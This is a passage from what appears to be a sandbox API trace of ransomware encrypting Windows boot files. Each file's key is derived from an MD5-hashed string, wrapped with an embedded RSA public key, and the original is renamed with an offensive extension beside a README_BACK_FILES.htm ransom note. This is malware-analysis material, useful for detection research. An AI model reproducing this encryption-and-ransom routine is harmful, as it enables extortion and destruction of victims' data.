lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27edcb8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.134] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.134] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.134] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.134] CloseHandle (hObject=0xffffffff) returned 1 [0127.134] CloseHandle (hObject=0x5cd8) returned 1 [0127.134] CopyFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0127.137] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0127.138] DeleteFileA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.gsg")) returned 1 [0127.138] MoveFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.fuck")) returned 0 [0127.139] CryptDestroyHash (hHash=0x69d428) returned 1 [0127.139] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0127.139] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.139] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.139] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.139] GetLastError () returned 0x5 [0127.139] GetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui")) returned 0x20 [0127.140] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0127.140] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.140] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.141] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.141] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.143] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.143] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.143] CryptHashData (hHash=0x27ff098, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.143] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x27ff098, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff598) returned 1 [0127.143] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.143] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee180) returned 1 [0127.143] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee180, dwCertEncodingType=0x1, pInfo=0x28003e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800410*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800418*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff398) returned 1 [0127.143] CryptEncrypt (in: hKey=0x27ff398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.144] CryptEncrypt (in: hKey=0x27ff398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee538*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ee538*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.144] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee538*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee538*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.144] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.144] CryptEncrypt (in: hKey=0x27ff598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.144] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.145] CloseHandle (hObject=0xffffffff) returned 1 [0127.145] CloseHandle (hObject=0x5cd8) returned 1 [0127.145] CopyFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0127.148] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0127.149] DeleteFileA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.gsg")) returned 1 [0127.150] MoveFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.fuck")) returned 0 [0127.150] CryptDestroyHash (hHash=0x27ff098) returned 1 [0127.150] CryptDestroyKey (hKey=0x27ff598) returned 1 [0127.150] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.150] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0127.150] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0127.150] GetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\README_BACK_FILES.htm" (normalized: "c:\\boot\\hu-hu\\readme_back_files.htm")) returned 0xffffffff [0127.150] AreFileApisANSI () returned 1 [0127.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d1a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0127.150] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\README_BACK_FILES.htm" (normalized: "c:\\boot\\hu-hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0127.152] GetFileType (hFile=0x5cec) returned 0x1 [0127.152] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0127.153] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0127.153] FindFirstFileA (in: lpFileName="C:\\\\Boot\\it-IT\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff418 [0127.153] FindNextFileA (in: hFindFile=0x27ff418, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.153] FindNextFileA (in: hFindFile=0x27ff418, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.153] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.153] GetLastError () returned 0x0 [0127.153] GetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0127.154] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0127.154] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.154] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.154] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.155] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.157] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.157] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.157] CryptHashData (hHash=0x27ff498, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.157] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x27ff498, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff358) returned 1 [0127.157] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.157] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.157] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee648) returned 1 [0127.158] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee648, dwCertEncodingType=0x1, pInfo=0x27ffc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ffcc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ffcc8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff3d8) returned 1 [0127.158] CryptEncrypt (in: hKey=0x27ff3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.158] CryptEncrypt (in: hKey=0x27ff3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee208*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ee208*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.158] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee208*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee208*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.159] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.159] CryptEncrypt (in: hKey=0x27ff358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.159] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.159] CloseHandle (hObject=0xffffffff) returned 1 [0127.159] CloseHandle (hObject=0x5cd8) returned 1 [0127.160] CopyFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0127.163] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0127.163] DeleteFileA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.gsg")) returned 1 [0127.164] MoveFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.fuck")) returned 0 [0127.164] CryptDestroyHash (hHash=0x27ff498) returned 1 [0127.164] CryptDestroyKey (hKey=0x27ff358) returned 1 [0127.165] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.165] FindNextFileA (in: hFindFile=0x27ff418, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.165] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.165] GetLastError () returned 0x5 [0127.165] GetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui")) returned 0x20 [0127.165] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0127.165] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.165] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.166] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.166] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.168] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.168] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.168] CryptHashData (hHash=0x27ff318, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.169] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x27ff318, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff658) returned 1 [0127.169] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.169] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.169] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee6d0) returned 1 [0127.169] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee6d0, dwCertEncodingType=0x1, pInfo=0x2800da0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800dd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800dd8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff498) returned 1 [0127.169] CryptEncrypt (in: hKey=0x27ff498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.169] CryptEncrypt (in: hKey=0x27ff498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee290*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ee290*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.169] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee290*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.170] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.170] CryptEncrypt (in: hKey=0x27ff658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.170] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.170] CloseHandle (hObject=0xffffffff) returned 1 [0127.170] CloseHandle (hObject=0x5cd8) returned 1 [0127.171] CopyFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0127.174] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0127.175] DeleteFileA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.gsg")) returned 1 [0127.175] MoveFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.fuck")) returned 0 [0127.176] CryptDestroyHash (hHash=0x27ff318) returned 1 [0127.176] CryptDestroyKey (hKey=0x27ff658) returned 1 [0127.176] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.176] FindNextFileA (in: hFindFile=0x27ff418, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0127.176] FindClose (in: hFindFile=0x27ff418 | out: hFindFile=0x27ff418) returned 1 [0127.176] GetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\it-it\\readme_back_files.htm")) returned 0xffffffff [0127.176] AreFileApisANSI () returned 1 [0127.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d788, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0127.176] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\it-it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.120] GetFileType (hFile=0x5d50) returned 0x1 [0139.125] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.127] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.127] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ja-JP\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff298 [0139.128] FindNextFileA (in: hFindFile=0x27ff298, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.128] FindNextFileA (in: hFindFile=0x27ff298, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.129] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.129] GetLastError () returned 0x0 [0139.129] GetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0139.129] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.130] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.130] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.130] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.131] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0139.138] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.139] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.139] CryptHashData (hHash=0x27ff158, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.139] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x27ff158, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff518) returned 